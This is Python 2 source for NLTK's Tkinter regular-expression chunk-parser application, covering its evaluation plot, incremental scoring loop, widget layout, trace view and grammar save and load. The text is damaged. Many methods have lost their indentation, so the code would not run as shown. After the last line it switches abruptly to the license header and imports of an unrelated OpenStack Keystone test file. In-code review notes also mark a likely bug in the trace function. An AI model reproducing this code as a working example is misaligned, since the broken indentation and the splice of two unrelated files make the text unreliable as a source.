            max_precision = max(precision, max_precision)
            max_recall = max(recall, max_recall)

#         if max_precision-min_precision > max_recall-min_recall:
#             min_recall -= (max_precision-min_precision)/2
#             max_recall += (max_precision-min_precision)/2
#         else:
#             min_precision -= (max_recall-min_recall)/2
#             max_precision += (max_recall-min_recall)/2

#         if min_recall < 0:
#             max_recall -= min_recall
#             min_recall = 0
#         if min_precision < 0:
#             max_precision -= min_precision
#             min_precision = 0

        min_precision = max(min_precision-.01, 0)
        min_recall = max(min_recall-.01, 0)
        max_precision = min(max_precision+.01, 1)
        max_recall = min(max_recall+.01, 1)
    else:
        min_precision = min_recall = 0
        max_precision = max_recall = 1

    # Draw the axis lines & grid lines
    for i in range(11):
        x = left + (right-left)*((i/10.-min_recall)/
                                 (max_recall-min_recall))
        y = bot - (bot-top)*((i/10.-min_precision)/
                             (max_precision-min_precision))
        if left < x < right:
            self.evalbox.create_line(x, top, x, bot, fill='#888')
        if top < y < bot:
            self.evalbox.create_line(left, y, right, y, fill='#888')
    self.evalbox.create_line(left, top, left, bot)
    self.evalbox.create_line(left, bot, right, bot)

    # Display the plot's scale
    self.evalbox.create_text(
        left-3, bot, justify='right', anchor='se',
        text='%d%%' % (100*min_precision))
    self.evalbox.create_text(
        left-3, top, justify='right', anchor='ne',
        text='%d%%' % (100*max_precision))
    self.evalbox.create_text(
        left, bot+3, justify='center', anchor='nw',
        text='%d%%' % (100*min_recall))
    self.evalbox.create_text(
        right, bot+3, justify='center', anchor='ne',
        text='%d%%' % (100*max_recall))

    # Display the scores.
    prev_x = prev_y = None
    for i, (_, precision, recall, fscore) in enumerate(self._history):
        x = left + (right-left) * ((recall-min_recall) /
                                   (max_recall-min_recall))
        y = bot - (bot-top) * ((precision-min_precision) /
                               (max_precision-min_precision))
        if i == self._history_index:
            # Highlight the currently-selected grammar and report its
            # scores in the status bar.
            self.evalbox.create_oval(x-2,y-2,x+2,y+2,
                                     fill='#0f0', outline='#000')
            self.status['text'] = (
                'Precision: %.2f%%\t' % (precision*100)+
                'Recall: %.2f%%\t' % (recall*100)+
                'F-score: %.2f%%' % (fscore*100))
        else:
            self.evalbox.lower(
                self.evalbox.create_oval(x-2,y-2,x+2,y+2,
                                         fill='#afa', outline='#8c8'))
        # Optionally connect successive points with lines.
        if prev_x is not None and self._eval_lines.get():
            self.evalbox.lower(
                self.evalbox.create_line(prev_x, prev_y, x, y,
                                         fill='#8c8'))
        prev_x, prev_y = x, y
_eval_demon_running = False # True while an eval pass is scheduled via after()
def _eval_demon(self):
    """Incrementally evaluate the current grammar on the development set.

    Runs one chunk of sentences per call and re-schedules itself via
    Tk's after() until the (size-restricted) devset is fully scored,
    then records (grammar, precision, recall, f-score) in the history.
    """
    if self.top is None: return
    if self.chunker is None:
        self._eval_demon_running = False
        return

    # Note our starting time.
    t0 = time.time()

    # If are still typing, then wait for them to finish.
    if (time.time()-self._last_keypress < self._EVAL_DELAY and
        self.normalized_grammar != self._eval_normalized_grammar):
        self._eval_demon_running = True
        return self.top.after(int(self._EVAL_FREQ*1000), self._eval_demon)

    # If the grammar changed, restart the evaluation.
    if self.normalized_grammar != self._eval_normalized_grammar:
        # Check if we've seen this grammar already.  If so, then
        # just use the old evaluation values.
        for (g, p, r, f) in self._history:
            if self.normalized_grammar == self.normalize_grammar(g):
                self._history.append( (g, p, r, f) )
                self._history_index = len(self._history) - 1
                self._eval_plot()
                self._eval_demon_running = False
                self._eval_normalized_grammar = None
                return
        self._eval_index = 0
        self._eval_score = nltk.chunk.ChunkScore(chunk_node=
                                                 self._chunk_node)
        self._eval_grammar = self.grammar
        self._eval_normalized_grammar = self.normalized_grammar

    # If the grammar is empty, the don't bother evaluating it, or
    # recording it in history -- the score will just be 0.
    if self.normalized_grammar.strip() == '':
        #self._eval_index = self._devset_size.get()
        self._eval_demon_running = False
        return

    # Score the next set of examples
    for gold in self.devset[self._eval_index:
                            min(self._eval_index+self._EVAL_CHUNK,
                                self._devset_size.get())]:
        guess = self._chunkparse(gold.leaves())
        self._eval_score.score(gold, guess)

    # update our index in the devset.
    self._eval_index += self._EVAL_CHUNK

    # Check if we're done
    if self._eval_index >= self._devset_size.get():
        self._history.append( (self._eval_grammar,
                               self._eval_score.precision(),
                               self._eval_score.recall(),
                               self._eval_score.f_measure()) )
        self._history_index = len(self._history)-1
        self._eval_plot()
        self._eval_demon_running = False
        self._eval_normalized_grammar = None
    else:
        # Not done: report progress, adapt the chunk size to the time
        # this pass took, and re-schedule ourselves.
        progress = 100*self._eval_index/self._devset_size.get()
        self.status['text'] = ('Evaluating on Development Set (%d%%)' %
                               progress)
        self._eval_demon_running = True
        self._adaptively_modify_eval_chunk(time.time() - t0)
        self.top.after(int(self._EVAL_FREQ*1000), self._eval_demon)
def _adaptively_modify_eval_chunk(self, t):
"""
Modify _EVAL_CHUNK to try to keep the amount of time that the
eval demon takes between _EVAL_DEMON_MIN and _EVAL_DEMON_MAX.
@param t: The amount of time that the eval demon took.
"""
if t > self._EVAL_DEMON_MAX and self._EVAL_CHUNK > 5:
self._EVAL_CHUNK = min(self._EVAL_CHUNK-1,
max(int(self._EVAL_CHUNK*(self._EVAL_DEMON_MAX/t)),
self._EVAL_CHUNK-10))
elif t < self._EVAL_DEMON_MIN:
self._EVAL_CHUNK = max(self._EVAL_CHUNK+1,
min(int(self._EVAL_CHUNK*(self._EVAL_DEMON_MIN/t)),
self._EVAL_CHUNK+10))
    def _init_widgets(self, top):
        """Create and lay out all of the application's Tkinter widgets.

        Builds, inside *top*: the grammar editor (with scrollbar and
        history buttons), the tabbed help box, the development-set
        viewer (with scrollbars and navigation buttons), the
        evaluation canvas (with plot-option checkbuttons), the status
        bar, and the text tags used for chunk coloring and grammar
        syntax highlighting.
        """
        frame0 = Frame(top, **self._FRAME_PARAMS)
        # Column 0 holds the grammar/devset; column 3 the help/eval box.
        frame0.grid_columnconfigure(0, weight=4)
        frame0.grid_columnconfigure(3, weight=2)
        frame0.grid_rowconfigure(1, weight=1)
        frame0.grid_rowconfigure(5, weight=1)
        # The grammar
        self.grammarbox = Text(frame0, font=self._font,
                               **self._GRAMMARBOX_PARAMS)
        self.grammarlabel = Label(frame0, font=self._font, text='Grammar:',
                                  highlightcolor='black',
                                  background=self._GRAMMARBOX_PARAMS['background'])
        self.grammarlabel.grid(column=0, row=0, sticky='SW')
        self.grammarbox.grid(column=0, row=1, sticky='NEWS')
        # Scroll bar for grammar
        grammar_scrollbar = Scrollbar(frame0, command=self.grammarbox.yview)
        grammar_scrollbar.grid(column=1, row=1, sticky='NWS')
        self.grammarbox.config(yscrollcommand=grammar_scrollbar.set)
        # grammar buttons
        bg = self._FRAME_PARAMS['background']
        frame3 = Frame(frame0, background=bg)
        frame3.grid(column=0, row=2, sticky='EW')
        Button(frame3, text='Prev Grammar', command=self._history_prev,
               **self._BUTTON_PARAMS).pack(side='left')
        Button(frame3, text='Next Grammar', command=self._history_next,
               **self._BUTTON_PARAMS).pack(side='left')
        # Help box
        self.helpbox = Text(frame0, font=self._smallfont,
                            **self._HELPBOX_PARAMS)
        self.helpbox.grid(column=3, row=1, sticky='NEWS')
        self.helptabs = {}
        bg = self._FRAME_PARAMS['background']
        helptab_frame = Frame(frame0, background=bg)
        helptab_frame.grid(column=3, row=0, sticky='SW')
        # One clickable label per help page, separated by spacer frames.
        for i, (tab, tabstops, text) in enumerate(self.HELP):
            label = Label(helptab_frame, text=tab, font=self._smallfont)
            label.grid(column=i*2, row=0, sticky='S')
            #help_frame.grid_columnconfigure(i, weight=1)
            #label.pack(side='left')
            label.bind('<ButtonPress>', lambda e, tab=tab: self.show_help(tab))
            self.helptabs[tab] = label
            Frame(helptab_frame, height=1, width=self._HELPTAB_SPACER,
                  background=bg).grid(column=i*2+1, row=0)
        self.helptabs[self.HELP[0][0]].configure(font=self._font)
        self.helpbox.tag_config('elide', elide=True)
        for (tag, params) in self.HELP_AUTOTAG:
            self.helpbox.tag_config('tag-%s' % tag, **params)
        self.show_help(self.HELP[0][0])
        # Scroll bar for helpbox
        help_scrollbar = Scrollbar(frame0, command=self.helpbox.yview)
        self.helpbox.config(yscrollcommand=help_scrollbar.set)
        help_scrollbar.grid(column=4, row=1, sticky='NWS')
        # The dev set
        frame4 = Frame(frame0, background=self._FRAME_PARAMS['background'])
        self.devsetbox = Text(frame4, font=self._font,
                              **self._DEVSETBOX_PARAMS)
        self.devsetbox.pack(expand=True, fill='both')
        self.devsetlabel = Label(frame0, font=self._font,
                                 text='Development Set:', justify='right',
                                 background=self._DEVSETBOX_PARAMS['background'])
        self.devsetlabel.grid(column=0, row=4, sticky='SW')
        frame4.grid(column=0, row=5, sticky='NEWS')
        # dev set scrollbars
        self.devset_scroll = Scrollbar(frame0, command=self._devset_scroll)
        self.devset_scroll.grid(column=1, row=5, sticky='NWS')
        self.devset_xscroll = Scrollbar(frame4, command=self.devsetbox.xview,
                                        orient='horiz')
        self.devsetbox['xscrollcommand'] = self.devset_xscroll.set
        self.devset_xscroll.pack(side='bottom', fill='x')
        # dev set buttons
        bg = self._FRAME_PARAMS['background']
        frame1 = Frame(frame0, background=bg)
        frame1.grid(column=0, row=7, sticky='EW')
        Button(frame1, text='Prev Example (Ctrl-p)',
               command=self._devset_prev,
               **self._BUTTON_PARAMS).pack(side='left')
        Button(frame1, text='Next Example (Ctrl-n)',
               command=self._devset_next,
               **self._BUTTON_PARAMS).pack(side='left')
        self.devset_button = Button(frame1, text='Show example',
                                    command=self.show_devset,
                                    state='disabled',
                                    **self._BUTTON_PARAMS)
        self.devset_button.pack(side='right')
        self.trace_button = Button(frame1, text='Show trace',
                                   command=self.show_trace,
                                   **self._BUTTON_PARAMS)
        self.trace_button.pack(side='right')
        # evaluation box
        self.evalbox = Canvas(frame0, **self._EVALBOX_PARAMS)
        label = Label(frame0, font=self._font, text='Evaluation:',
                      justify='right', background=self._EVALBOX_PARAMS['background'])
        label.grid(column=3, row=4, sticky='SW')
        self.evalbox.grid(column=3, row=5, sticky='NEWS', columnspan=2)
        # evaluation box buttons
        bg = self._FRAME_PARAMS['background']
        frame2 = Frame(frame0, background=bg)
        frame2.grid(column=3, row=7, sticky='EW')
        self._autoscale = IntVar(self.top)
        self._autoscale.set(False)
        Checkbutton(frame2, variable=self._autoscale, command=self._eval_plot,
                    text='Zoom', **self._BUTTON_PARAMS).pack(side='left')
        self._eval_lines = IntVar(self.top)
        self._eval_lines.set(False)
        Checkbutton(frame2, variable=self._eval_lines, command=self._eval_plot,
                    text='Lines', **self._BUTTON_PARAMS).pack(side='left')
        Button(frame2, text='History',
               **self._BUTTON_PARAMS).pack(side='right')
        # The status label
        self.status = Label(frame0, font=self._font, **self._STATUS_PARAMS)
        self.status.grid(column=0, row=9, sticky='NEW', padx=3, pady=2,
                         columnspan=5)
        # Help box & devset box can't be edited.
        self.helpbox['state'] = 'disabled'
        self.devsetbox['state'] = 'disabled'
        # Spacers
        bg = self._FRAME_PARAMS['background']
        Frame(frame0, height=10, width=0, background=bg).grid(column=0, row=3)
        Frame(frame0, height=0, width=10, background=bg).grid(column=2, row=0)
        Frame(frame0, height=6, width=0, background=bg).grid(column=0, row=8)
        # pack the frame.
        frame0.pack(fill='both', expand=True)
        # Set up colors for the devset box
        self.devsetbox.tag_config('true-pos', background='#afa',
                                  underline='True')
        self.devsetbox.tag_config('false-neg', underline='True',
                                  foreground='#800')
        self.devsetbox.tag_config('false-pos', background='#faa')
        self.devsetbox.tag_config('trace', foreground='#666', wrap='none')
        self.devsetbox.tag_config('wrapindent', lmargin2=30, wrap='none')
        self.devsetbox.tag_config('error', foreground='#800')
        # And for the grammarbox
        self.grammarbox.tag_config('error', background='#fec')
        self.grammarbox.tag_config('comment', foreground='#840')
        self.grammarbox.tag_config('angle', foreground='#00f')
        self.grammarbox.tag_config('brace', foreground='#0a0')
        self.grammarbox.tag_config('hangindent', lmargin1=0, lmargin2=40)
    # True while the devset box shows a rule-by-rule trace instead of
    # the plain development-set view.
    _showing_trace = False
    def show_trace(self, *e):
        """Show a step-by-step trace of the grammar on the current sentence.

        For each prefix of the rule list, prints the sentence's tag
        sequence and colors chunk spans as 'true-pos' / 'false-neg' /
        'false-pos' against the gold tree.  If no valid chunker exists,
        displays a waiting message instead.
        """
        self._showing_trace = True
        self.trace_button['state'] = 'disabled'
        self.devset_button['state'] = 'normal'
        self.devsetbox['state'] = 'normal'
        #self.devsetbox['wrap'] = 'none'
        self.devsetbox.delete('1.0', 'end')
        self.devsetlabel['text']='Development Set (%d/%d)' % (
            (self.devset_index+1, self._devset_size.get()))
        if self.chunker is None:
            self.devsetbox.insert('1.0', 'Trace: waiting for a valid grammar.')
            self.devsetbox.tag_add('error', '1.0', 'end')
            return # can't do anything more
        gold_tree = self.devset[self.devset_index]
        rules = self.chunker.rules()
        # Calculate the tag sequence
        tagseq = '\t'
        charnum = [1]
        for wordnum, (word, pos) in enumerate(gold_tree.leaves()):
            tagseq += '%s ' % pos
            charnum.append(len(tagseq))
        # Map (trace-step, word-index) -> column, and step -> line, for
        # use by _color_chunk().
        self.charnum = dict(((i, j), charnum[j])
                            for i in range(len(rules)+1)
                            for j in range(len(charnum)))
        self.linenum = dict((i,i*2+2) for i in range(len(rules)+1))
        for i in range(len(rules)+1):
            if i == 0:
                self.devsetbox.insert('end', 'Start:\n')
                self.devsetbox.tag_add('trace', 'end -2c linestart', 'end -2c')
            else:
                self.devsetbox.insert('end', 'Apply %s:\n' % rules[i-1])
                self.devsetbox.tag_add('trace', 'end -2c linestart', 'end -2c')
            # Display the tag sequence.
            self.devsetbox.insert('end', tagseq+'\n')
            self.devsetbox.tag_add('wrapindent','end -2c linestart','end -2c')
            # Run a partial parser, and extract gold & test chunks
            # NOTE(review): `chunker` (built from rules[:i]) is never
            # used -- _chunkparse() parses with self.chunker, i.e. the
            # full grammar.  This looks like a bug; verify whether the
            # partial parser was meant to be used for each trace step.
            chunker = nltk.chunk.RegexpChunkParser(rules[:i])
            test_tree = self._chunkparse(gold_tree.leaves())
            gold_chunks = self._chunks(gold_tree)
            test_chunks = self._chunks(test_tree)
            # Compare them.
            for chunk in gold_chunks.intersection(test_chunks):
                self._color_chunk(i, chunk, 'true-pos')
            for chunk in gold_chunks - test_chunks:
                self._color_chunk(i, chunk, 'false-neg')
            for chunk in test_chunks - gold_chunks:
                self._color_chunk(i, chunk, 'false-pos')
        self.devsetbox.insert('end', 'Finished.\n')
        self.devsetbox.tag_add('trace', 'end -2c linestart', 'end -2c')
        # This is a hack, because the x-scrollbar isn't updating its
        # position right -- I'm not sure what the underlying cause is
        # though. (This is on OS X w/ python 2.5)
        self.top.after(100, self.devset_xscroll.set, 0, .3)
    def show_help(self, tab):
        """Display help page *tab* in the help box.

        Enables the (normally read-only) help box, inserts the page's
        text with its tab stops, applies the HELP_AUTOTAG markup tags
        (hiding the literal <tag>...</tag> markers via the 'elide'
        tag), highlights the selected tab label, dims the others, and
        disables the box again.
        """
        self.helpbox['state'] = 'normal'
        self.helpbox.delete('1.0', 'end')
        for (name, tabstops, text) in self.HELP:
            if name == tab:
                # Substitute the tagset listing; the Python 2
                # tuple-unpacking lambda sorts word tags before
                # punctuation tags.
                text = text.replace('<<TAGSET>>', '\n'.join(
                    ('\t%s\t%s' % item for item in sorted(self.tagset.items(),
                    key=lambda (t,w):re.match('\w+',t) and (0,t) or (1,t)))))
                self.helptabs[name].config(**self._HELPTAB_FG_PARAMS)
                self.helpbox.config(tabs=tabstops)
                self.helpbox.insert('1.0', text+'\n'*20)
                C = '1.0 + %d chars'
                for (tag, params) in self.HELP_AUTOTAG:
                    pattern = '(?s)(<%s>)(.*?)(</%s>)' % (tag, tag)
                    for m in re.finditer(pattern, text):
                        self.helpbox.tag_add('elide',
                                             C % m.start(1), C % m.end(1))
                        self.helpbox.tag_add('tag-%s' % tag,
                                             C % m.start(2), C % m.end(2))
                        self.helpbox.tag_add('elide',
                                             C % m.start(3), C % m.end(3))
            else:
                self.helptabs[name].config(**self._HELPTAB_BG_PARAMS)
        self.helpbox['state'] = 'disabled'
def _history_prev(self, *e):
self._view_history(self._history_index-1)
return 'break'
def _history_next(self, *e):
self._view_history(self._history_index+1)
return 'break'
def _view_history(self, index):
# Bounds & sanity checking:
index = max(0, min(len(self._history)-1, index))
if not self._history: return
# Already viewing the requested history item?
if index == self._history_index:
return
# Show the requested grammar. It will get added to _history
# only if they edit it (causing self.update() to get run.)
self.grammarbox['state'] = 'normal'
self.grammarbox.delete('1.0', 'end')
self.grammarbox.insert('end', self._history[index][0])
self.grammarbox.mark_set('insert', '1.0')
self._history_index = index
self._syntax_highlight_grammar(self._history[index][0])
# Record the normalized grammar & regenerate the chunker.
self.normalized_grammar = self.normalize_grammar(
self._history[index][0])
if self.normalized_grammar:
rules = [nltk.chunk.regexp.RegexpChunkRule.parse(line)
for line in self.normalized_grammar.split('\n')]
else:
rules = []
self.chunker = nltk.chunk.RegexpChunkParser(rules)
# Show the score.
self._eval_plot()
# Update the devset box
self._highlight_devset()
if self._showing_trace: self.show_trace()
# Update the grammar label
if self._history_index < len(self._history)-1:
self.grammarlabel['text'] = 'Grammar %s/%s:' % (
self._history_index+1, len(self._history))
else:
self.grammarlabel['text'] = 'Grammar:'
def _devset_next(self, *e):
self._devset_scroll('scroll', 1, 'page')
return 'break'
def _devset_prev(self, *e):
self._devset_scroll('scroll', -1, 'page')
return 'break'
def destroy(self, *e):
if self.top is None: return
self.top.destroy()
self.top = None
def _devset_scroll(self, command, *args):
N = 1 # size of a page -- one sentence.
showing_trace = self._showing_trace
if command == 'scroll' and args[1].startswith('unit'):
self.show_devset(self.devset_index+int(args[0]))
elif command == 'scroll' and args[1].startswith('page'):
self.show_devset(self.devset_index+N*int(args[0]))
elif command == 'moveto':
self.show_devset(int(float(args[0])*self._devset_size.get()))
else:
assert 0, 'bad scroll command %s %s' % (command, args)
if showing_trace:
self.show_trace()
    def show_devset(self, index=None):
        """Display development-set sentence *index* (default: current).

        Leaves trace mode, rebuilds the devset text box, records the
        word -> character-offset map used by _color_chunk(), re-applies
        chunk highlighting if a chunker exists, and updates the
        scrollbar.  No-op if *index* is already shown and we are not in
        trace mode.
        """
        if index is None: index = self.devset_index
        # Bounds checking
        index = min(max(0, index), self._devset_size.get()-1)
        if index == self.devset_index and not self._showing_trace: return
        self.devset_index = index
        self._showing_trace = False
        self.trace_button['state'] = 'normal'
        self.devset_button['state'] = 'disabled'
        # Clear the text box.
        self.devsetbox['state'] = 'normal'
        self.devsetbox['wrap'] = 'word'
        self.devsetbox.delete('1.0', 'end')
        self.devsetlabel['text']='Development Set (%d/%d)' % (
            (self.devset_index+1, self._devset_size.get()))
        # Add the sentences
        sample = self.devset[self.devset_index:self.devset_index+1]
        self.charnum = {}
        self.linenum = {0:1}
        for sentnum, sent in enumerate(sample):
            linestr = ''
            # charnum[sent, i] is the column where word i starts;
            # charnum[sent, i+1] marks the end of the last word.
            for wordnum, (word, pos) in enumerate(sent.leaves()):
                self.charnum[sentnum, wordnum] = len(linestr)
                linestr += '%s/%s ' % (word, pos)
                self.charnum[sentnum, wordnum+1] = len(linestr)
            self.devsetbox.insert('end', linestr[:-1]+'\n\n')
        # Highlight chunks in the dev set
        if self.chunker is not None:
            self._highlight_devset()
        self.devsetbox['state'] = 'disabled'
        # Update the scrollbar
        first = float(self.devset_index)/self._devset_size.get()
        last = float(self.devset_index+2)/self._devset_size.get()
        self.devset_scroll.set(first, last)
def _chunks(self, tree):
chunks = set()
wordnum = 0
for child in tree:
if isinstance(child, Tree):
if child.node == self._chunk_node:
chunks.add( (wordnum, wordnum+len(child)) )
wordnum += len(child)
else:
wordnum += 1
return chunks
    def _syntax_highlight_grammar(self, grammar):
        """Apply syntax-highlighting tags to *grammar* in the grammar box.

        Tags trailing comments ('comment'), angle brackets ('angle'),
        and curly braces ('brace'), and applies a hanging indent to
        every line.  Brackets that fall inside a comment are left
        untagged.
        """
        if self.top is None: return
        self.grammarbox.tag_remove('comment', '1.0', 'end')
        self.grammarbox.tag_remove('angle', '1.0', 'end')
        self.grammarbox.tag_remove('brace', '1.0', 'end')
        self.grammarbox.tag_add('hangindent', '1.0', 'end')
        for lineno, line in enumerate(grammar.split('\n')):
            if not line.strip(): continue
            # Group 2 matches an (unescaped) trailing '#' comment.
            m = re.match(r'(\\.|[^#])*(#.*)?', line)
            comment_start = None
            if m.group(2):
                comment_start = m.start(2)
                s = '%d.%d' % (lineno+1, m.start(2))
                e = '%d.%d' % (lineno+1, m.end(2))
                self.grammarbox.tag_add('comment', s, e)
            for m in re.finditer('[<>{}]', line):
                # Stop once we reach the comment portion of the line.
                if comment_start is not None and m.start() >= comment_start:
                    break
                s = '%d.%d' % (lineno+1, m.start())
                e = '%d.%d' % (lineno+1, m.end())
                if m.group() in '<>':
                    self.grammarbox.tag_add('angle', s, e)
                else:
                    self.grammarbox.tag_add('brace', s, e)
    def _grammarcheck(self, grammar):
        """Highlight grammar lines that fail to parse.

        Strips trailing comments from each line and attempts to parse
        it as a RegexpChunkRule; lines that raise ValueError are tagged
        'error' in the grammar box.  Also clears the status line.
        """
        if self.top is None: return
        self.grammarbox.tag_remove('error', '1.0', 'end')
        # NOTE(review): this list is reset here but never appended to
        # in this method.
        self._grammarcheck_errs = []
        for lineno, line in enumerate(grammar.split('\n')):
            # Remove any (unescaped) trailing '#' comment.
            line = re.sub(r'((\\.|[^#])*)(#.*)?', r'\1', line)
            line = line.strip()
            if line:
                try: nltk.chunk.regexp.RegexpChunkRule.parse(line)
                except ValueError, e:
                    self.grammarbox.tag_add('error', '%s.0' % (lineno+1),
                                            '%s.0 lineend' % (lineno+1))
        self.status['text'] = ''
    def update(self, *event):
        """Re-parse the grammar in the editor and refresh the display.

        Called on keypresses in the grammar box (and manually).  If the
        normalized grammar text is unchanged, does nothing.  Otherwise
        re-highlights the grammar, rebuilds ``self.chunker`` (or sets
        it to None and marks errors if the grammar does not parse),
        refreshes the trace/devset view, and (re)starts the evaluation
        demon.
        """
        # Record when update was called (for grammarcheck)
        if event:
            self._last_keypress = time.time()
        # Read the grammar from the Text box.
        self.grammar = grammar = self.grammarbox.get('1.0', 'end')
        # If the grammar hasn't changed, do nothing:
        normalized_grammar = self.normalize_grammar(grammar)
        if normalized_grammar == self.normalized_grammar:
            return
        else:
            self.normalized_grammar = normalized_grammar
        # If the grammar has changed, and we're looking at history,
        # then stop looking at history.
        if self._history_index < len(self._history)-1:
            self.grammarlabel['text'] = 'Grammar:'
        self._syntax_highlight_grammar(grammar)
        # The grammar has changed; try parsing it. If it doesn't
        # parse, do nothing. (flag error location?)
        try:
            # Note: the normalized grammar has no blank lines.
            if normalized_grammar:
                rules = [nltk.chunk.regexp.RegexpChunkRule.parse(line)
                         for line in normalized_grammar.split('\n')]
            else:
                rules = []
        except ValueError, e:
            # Use the un-normalized grammar for error highlighting.
            self._grammarcheck(grammar)
            self.chunker = None
            return
        self.chunker = nltk.chunk.RegexpChunkParser(rules)
        self.grammarbox.tag_remove('error', '1.0', 'end')
        self.grammar_changed = time.time()
        # Display the results
        if self._showing_trace:
            self.show_trace()
        else:
            self._highlight_devset()
        # Start the eval demon
        if not self._eval_demon_running:
            self._eval_demon()
    def _highlight_devset(self, sample=None):
        """Color chunk agreement/disagreement in the devset box.

        Parses each sentence in *sample* (default: the currently
        displayed sentence) with ``self.chunker`` and tags chunk spans
        as 'true-pos', 'false-neg', or 'false-pos' relative to the
        gold trees.
        """
        if sample is None:
            sample = self.devset[self.devset_index:self.devset_index+1]
        # Clear any previous highlighting.
        self.devsetbox.tag_remove('true-pos', '1.0', 'end')
        self.devsetbox.tag_remove('false-neg', '1.0', 'end')
        self.devsetbox.tag_remove('false-pos', '1.0', 'end')
        # Run the grammar on the test cases.
        for sentnum, gold_tree in enumerate(sample):
            # Run the chunk parser
            test_tree = self._chunkparse(gold_tree.leaves())
            # Extract gold & test chunks
            gold_chunks = self._chunks(gold_tree)
            test_chunks = self._chunks(test_tree)
            # Compare them.
            for chunk in gold_chunks.intersection(test_chunks):
                self._color_chunk(sentnum, chunk, 'true-pos')
            for chunk in gold_chunks - test_chunks:
                self._color_chunk(sentnum, chunk, 'false-neg')
            for chunk in test_chunks - gold_chunks:
                self._color_chunk(sentnum, chunk, 'false-pos')
    def _chunkparse(self, words):
        """Parse *words* with ``self.chunker``, tolerating bad grammars.

        Returns the parsed tree on success.  On ValueError/IndexError,
        flags the whole grammar box as an error and returns the bare
        *words* sequence (i.e. nothing gets chunked).
        """
        try:
            return self.chunker.parse(words)
        except (ValueError, IndexError), e:
            # There's an error somewhere in the grammar, but we're not sure
            # exactly where, so just mark the whole grammar as bad.
            # E.g., this is caused by: "({<NN>})"
            self.grammarbox.tag_add('error', '1.0', 'end')
            # Treat it as tagging nothing:
            return words
def _color_chunk(self, sentnum, chunk, tag):
start, end = chunk
self.devsetbox.tag_add(tag,
'%s.%s' % (self.linenum[sentnum], self.charnum[sentnum, start]),
'%s.%s' % (self.linenum[sentnum], self.charnum[sentnum, end]-1))
def reset(self):
# Clear various variables
self.chunker = None
self.grammar = None
self.normalized_grammar = None
self.grammar_changed = 0
self._history = []
self._history_index = 0
# Update the on-screen display.
self.grammarbox.delete('1.0', 'end')
self.show_devset(0)
self.update()
#self._eval_plot()
SAVE_GRAMMAR_TEMPLATE = (
'# Regexp Chunk Parsing Grammar\n'
'# Saved %(date)s\n'
'#\n'
'# Development set: %(devset)s\n'
'# Precision: %(precision)s\n'
'# Recall: %(recall)s\n'
'# F-score: %(fscore)s\n\n'
'%(grammar)s\n')
def save_grammar(self, filename=None):
if not filename:
ftypes = [('Chunk Gramamr', '.chunk'),
('All files', '*')]
filename = tkFileDialog.asksaveasfilename(filetypes=ftypes,
defaultextension='.chunk')
if not filename: return
if (self._history and self.normalized_grammar ==
self.normalize_grammar(self._history[-1][0])):
precision, recall, fscore = ['%.2f%%' % (100*v) for v in
self._history[-1][1:]]
elif self.chunker is None:
precision = recall = fscore = 'Grammar not well formed'
else:
precision = recall = fscore = 'Not finished evaluation yet'
out = open(filename, 'w')
out.write(self.SAVE_GRAMMAR_TEMPLATE % dict(
date=time.ctime(), devset=self.devset_name,
precision=precision, recall=recall, fscore=fscore,
grammar=self.grammar.strip()))
out.close()
def load_grammar(self, filename=None):
if not filename:
ftypes = [('Chunk Gramamr', '.chunk'),
('All files', '*')]
filename = tkFileDialog.askopenfilename(filetypes=ftypes,
defaultextension='.chunk')
if not filename: return
self.grammarbox.delete('1.0', 'end')
self.update()
grammar = open(filename).read()
grammar = re.sub('^\# Regexp Chunk Parsing Grammar[\s\S]*'
'F-score:.*\n', '', grammar).lstrip()
self.grammarbox.insert('1.0', grammar)
self.update()
def save_history(self, filename=None):
if not filename:
ftypes = [('Chunk Gramamr History', '.txt'),
('All files', '*')]
filename = tkFileDialog.asksaveasfilename(filetypes=ftypes,
defaultextension='.txt')
if not filename: return
out = open(filename, 'w')
out.write('# Regexp Chunk Parsing Grammar History\n')
out.write('# Saved %s\n' % time.ctime())
out.write('# Development set: %s\n' % self.devset_name)
for i, (g, p, r, f) in enumerate(self._history):
hdr = ('Grammar %d/%d (precision=%.2f%%, recall=%.2f%%, '
'fscore=%.2f%%)' % (i+1, len(self._history),
p*100, r*100, f*100))
out.write('\n%s\n' % hdr)
out.write(''.join(' %s\n' % line for line in g.strip().split()))
if not (self._history and self.normalized_grammar ==
self.normalize_grammar(self._history[-1][0])):
if self.chunker is None:
out.write('\nCurrent Grammar (not well-formed)\n')
else:
out.write('\nCurrent Grammar (not evaluated)\n')
out.write(''.join(' %s\n' % line for line
in self.grammar.strip().split()))
out.close()
    def about(self, *e):
        """Show an 'about' dialog for the application."""
        ABOUT = ("NLTK RegExp Chunk Parser Application\n"+
                 "Written by Edward Loper")
        TITLE = 'About: Regular Expression Chunk Parser Application'
        try:
            from tkMessageBox import Message
            Message(message=ABOUT, title=TITLE).show()
        except:
            # Deliberate catch-all: if the native message box is
            # unavailable for any reason, fall back to a plain
            # ShowText window.
            ShowText(self.top, TITLE, ABOUT)
def set_devset_size(self, size=None):
if size is not None: self._devset_size.set(size)
self._devset_size.set(min(len(self.devset), self._devset_size.get()))
self.show_devset(1)
self.show_devset(0)
# what about history? Evaluated at diff dev set sizes!
    def resize(self, size=None):
        """Set the base font size (optionally to *size*) and rescale the
        small font proportionally."""
        if size is not None: self._size.set(size)
        size = self._size.get()
        # Negative Tk font sizes are pixel sizes.
        self._font.configure(size=-(abs(size)))
        # Small font is 14/20 of the base (integer division under
        # Python 2), but never smaller than 10 pixels.
        self._smallfont.configure(size=min(-10, -(abs(size))*14/20))
    def mainloop(self, *args, **kwargs):
        """
        Enter the Tkinter mainloop. This function must be called if
        this demo is created from a non-interactive program (e.g.
        from a script); otherwise, the demo will close as soon as
        the script completes.
        """
        # Under IDLE, Tk already runs a mainloop; starting another
        # would block it.
        if in_idle(): return
        self.top.mainloop(*args, **kwargs)
def app():
    """Create a RegexpChunkApp window and block in its Tk mainloop."""
    demo = RegexpChunkApp()
    demo.mainloop()
# Launch the GUI demo when run as a script.
if __name__ == '__main__':
    app()
# Only the app() entry point is part of the public API.
__all__ = ['app']
| |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid
from oslo.utils import timeutils
import six
from testtools import matchers
from keystone import config
from keystone import exception
from keystone import tests
from keystone.tests import default_fixtures
